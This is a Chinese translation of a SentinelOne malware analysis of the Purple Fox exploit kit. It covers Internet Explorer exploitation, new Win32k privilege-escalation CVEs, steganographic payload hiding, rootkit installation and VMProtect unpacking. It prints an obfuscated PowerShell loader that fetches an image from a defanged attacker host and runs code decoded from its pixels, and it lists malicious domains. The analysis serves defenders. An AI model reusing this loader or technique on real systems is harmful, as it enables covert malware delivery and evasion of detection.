[[348952]]

Purple Fox屬于一種下載型木馬，能夠在感染目標(biāo)計(jì)算機(jī)后下載其他惡意軟件，如加密貨幣挖礦惡意軟件。用戶一旦被感染，就將面臨各種各樣的威脅。

研究人員最近發(fā)現(xiàn)攻擊者利用Purple Fox攻擊工具包攻擊易受攻擊的Internet Explorer版本的次數(shù)激增。

調(diào)查顯示，Purple Fox反復(fù)嘗試通過公開可用的漏洞利用代碼，包括使用兩個(gè)最新的CVE-CVE-2020-1054和CVE-2019-0808。

此外，我們注意到他們的攻擊流程發(fā)生了其他變化，這些變化使他們可以采用隱寫術(shù)并通過代碼虛擬化技術(shù)覆蓋惡意代碼，從而更好地規(guī)避防火墻保護(hù)和某些檢測工具。

在最近幾年中，Purple Fox改進(jìn)了其攻擊和傳播方法。它最初在2018年9月被發(fā)現(xiàn)，Purple Fox在2019年放棄使用NSIS(Nullsoft腳本可安裝系統(tǒng))和Rig漏洞利用工具包，而是采用PowerShell來實(shí)現(xiàn)無文件執(zhí)行。今年早些時(shí)候，ProofPoint詳細(xì)介紹了Purple Fox如何將CVE-2020-0674和CVE-2019-1458添加到其武器庫中。研究表明，Purple Fox已再次進(jìn)行了迭代，添加了更多CVE以實(shí)現(xiàn)特權(quán)升級，并采用隱寫和虛擬化技術(shù)來避免檢測和妨礙安全人員分析。

有效載荷傳播流程

 在我們觀察到的攻擊中，通過廣告或僅通過單擊錯(cuò)誤的URL將受害者定向到惡意站點(diǎn)。攻擊者將他們的惡意軟件托管在speedjudgmentacceleration[.]com上，并針對Internet Explorer用戶發(fā)起攻擊。

該漏洞利用VBScript代碼作為命令行運(yùn)行mshta.exe，然后運(yùn)行PowerShell。 PowerShell代碼從http[:]//rawcdn[.]githack[.]cyou/up.php?key=1下載并在內(nèi)存中執(zhí)行下一階段的代碼。

 

下一階段將遵循與以前版本的Purple Fox類似的模式，首先檢查它是否以管理員權(quán)限運(yùn)行。如果是這樣，它將直接從攻擊者的站點(diǎn)安裝key = 2的MSI軟件包。否則，它會嘗試幾種不同的“本地特權(quán)升級”漏洞來首先提升。

新特權(quán)升級漏洞

在最新版本的Purple Fox中，攻擊者改進(jìn)了兩點(diǎn)。

過去，Purple Fox會下載使用圖像文件擴(kuò)展名(update.jpg)的本地特權(quán)升級(local privilege escalation, LPE)二進(jìn)制文件，但它實(shí)際上是一個(gè)常規(guī)的可執(zhí)行文件。適當(dāng)?shù)姆阑饓σ?guī)則或安全軟件可以很容易地檢測到這種技術(shù)是惡意的。

現(xiàn)在，新版本的漏洞利用工具包將下載實(shí)際的映像文件(key = 3和key = 4)，并使用隱寫術(shù)將每個(gè)LPE嵌入映像中。下面是一個(gè)使用的圖像示例：

 下載后，將其提取到內(nèi)存中。以下代碼用于解碼和運(yùn)行有效載荷：

$uyxQcl8XomEdJUJd='sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http[:]//rawcdn[.]githack[.]cyou/up.php?key=3"));$o=a Byte[] 589824;(0..575)|%{foreach($x in(0..1023)){$p=$g.GetPixel($x,$_);$o[$_*1024+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..589362]))' 
 
IEX ($uyxQcl8XomEdJUJd) 

此外，現(xiàn)在正在利用兩個(gè)新的漏洞來幫助提升本地特權(quán)：CVE-2020-1054和CVE-2019-0808。兩者都是Win32k組件中的內(nèi)核漏洞。 CVE-2020-1054于今年5月進(jìn)行了修補(bǔ)。我們發(fā)現(xiàn)利用這些漏洞的攻擊者二進(jìn)制文件分別在2020年8月11日和2020年9月10日進(jìn)行了編譯。

該漏洞利用程序包含調(diào)試信息和大量信息字符串。例如，CVE-2020-1054上的調(diào)試路徑為：

D:\Personal\Windows\Windows10\Desktop\CVE-2020-1054-master\CVE-2020-1054-master\x64\Release\CVE-2020-1054.pdb 

從編譯時(shí)的文件夾名稱可以看出，該代碼來自Git存儲庫。我們能夠快速將漏洞利用追溯到以下公共存儲庫：CVE-2020-1054，CVE-2019-0808。

不幸的是，到目前為止，在野外還沒有尋找到更多具有類似特征的二進(jìn)制文件。

值得注意的是，所有的腳本都檢查HKCU\Software\7-Zip下一個(gè)特定且一致的注冊表值“StayOnTop”，設(shè)置此值似乎使惡意軟件能夠確定有效載荷是否成功運(yùn)行。因此，在計(jì)算機(jī)注冊表中找到該值就可以表示Purple Fox做出了哪些攻擊。

Rootkit有效載荷

PowerShell腳本和特權(quán)升級利用的目的最終是在計(jì)算機(jī)上安裝rootkit。如何釋放有效載荷和Rootkit組件

趨勢科技表示，早期版本的“紫狐貍”使用了msi.dll的MsiInstallProductA 函數(shù)來下載并執(zhí)行其有效載荷——一個(gè).msi文件，其中包含加密的shellcode以及32位和64位版本的有效載荷。

一旦執(zhí)行，它將重新啟動計(jì)算機(jī)并使用PendingFileRenameOperations注冊表(負(fù)責(zé)存儲操作系統(tǒng)重新啟動時(shí)將重命名的文件的名稱)以重命名其組件。

在重新啟動計(jì)算機(jī)后，它將使用其Rootkit功能(隱藏其文件和注冊表項(xiàng))創(chuàng)建一個(gè)掛起的svchost進(jìn)程并注入一個(gè)DLL，然后創(chuàng)建一個(gè)具有Rootkit功能的驅(qū)動程序。

在執(zhí)行有效載荷之前，它還會在注入的DLL中設(shè)置以下內(nèi)容：驅(qū)動程序文件(dump_ {random hex} .sys)——負(fù)責(zé)Rootkit功能，主組件是一個(gè)DLL文件(Ms {random hex} App.dll)。

然而，與早期版本不同，新版本“紫狐貍”選擇了使用開源代碼來啟用其Rootkit組件，包括隱藏并保護(hù)其文件和注冊表項(xiàng)。同樣值得注意的是，新版本“紫狐貍”還會使用一個(gè)文件實(shí)用程序軟件來隱藏其DLL組件，這阻止了逆向工程或破解嘗試。

但是，鑒于技術(shù)迭代帶來的變化，我們想檢查有效載荷方面是否還有任何新的發(fā)展。

我們在新域中找到了兩個(gè)版本的惡意軟件，它們都是rootkit的MSI安裝程序，其中一個(gè)丟失了文件。

安裝過程大致相同，重啟后，我們?nèi)匀豢吹绞褂肞endingFileRenameOperations將文件放置在system32目錄下。然而，在MSI包中的CustomAction表有vbscript代碼，運(yùn)行以下內(nèi)容：

 有趣的是，這些命令直接來自微軟有關(guān)如何防御CVE-2020-0674漏洞(Internet Explorer RCE)的咨詢，該漏洞被Purple Fox使用來獲得初始訪問權(quán)限。我們推測保護(hù)新感染的計(jì)算機(jī)不受該漏洞的影響可能是為了阻止競爭對手。

從MSI軟件包中提取惡意軟件后，我們注意到有效載荷還具有一項(xiàng)重要的新功能，不過它現(xiàn)在受VMProtect保護(hù)。

從PE的分區(qū)表中可以輕松觀察到VMProtect的使用：

 “.vmp%d” 部分中的入口點(diǎn)清楚地表明了VMProtect

由于采用多種技術(shù)來隱藏原始代碼并對其進(jìn)行模糊處理，因此安全研究人員的逆向處理變得更加困難了。

解壓縮VMProtect

逆向VMProtected二進(jìn)制文件時(shí)，有兩個(gè)主要障礙需要克服：打包數(shù)據(jù)和虛擬指令。

我們首先必須解壓縮二進(jìn)制文件中的數(shù)據(jù)，為此，我們使用了強(qiáng)大的x64dbg并打開了文件。之后，我們在VirtualProtect函數(shù)的開始處放置一個(gè)斷點(diǎn)：

想要記錄對該函數(shù)的所有調(diào)用，就要在“Log Text”框中輸入： 

 

VirtualProtect: lpAddress={a:[esp+4]}, dwSize={d:[esp+8]}, flNewProtect={x:[esp+C]} ;

運(yùn)行它，直到它崩潰，給出如下輸出：

 可以看到數(shù)據(jù)可能被解壓縮到虛擬地址0x401000，因此我們要監(jiān)控該地址，直到將數(shù)據(jù)寫入該地址為止。

重新啟動程序后，我們再次在VirtualProtect上放置一個(gè)斷點(diǎn)，并使該斷點(diǎn)命中八次。然后，我們將EIP設(shè)置為該地址，并使用x64dbg的內(nèi)置Scylla插件轉(zhuǎn)儲二進(jìn)制文件并修復(fù)其導(dǎo)入：

 這為我們提供了一個(gè)更小的，可調(diào)試的DLL文件，其中包含大量純文本字符串，以幫助我們調(diào)查惡意軟件。

DLL的代碼仍使用虛擬化的調(diào)用進(jìn)行了模糊處理，但幸運(yùn)的是，我們在字符串中找到了以下代碼：

 這類似于之前報(bào)告的rootkit版本，后者只是他們下載并編譯的公共rootkit。根據(jù)這些信息，我們推斷出他們并沒有實(shí)質(zhì)性地升級rootkit的功能。

總結(jié)

Purple Fox開發(fā)工具包正在積極升級迭代中，正如我們自2018年9月以來以及在我們的研究中再次看到的那樣，惡意軟件開發(fā)者正在試圖繞過Microsoft補(bǔ)丁程序，以便針對那些組織和安全團(tuán)隊(duì)利用公開的利用代碼而未能及時(shí)修補(bǔ)的漏洞。這個(gè)新的變種還通過采用隱寫術(shù)來隱藏LPE二進(jìn)制文件，并利用商業(yè)軟件來保護(hù)其代碼不被分析，從而提高了其逃避檢測的能力。

 本文翻譯自：https://labs.sentinelone.com/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/如若轉(zhuǎn)載，請注明原文地址。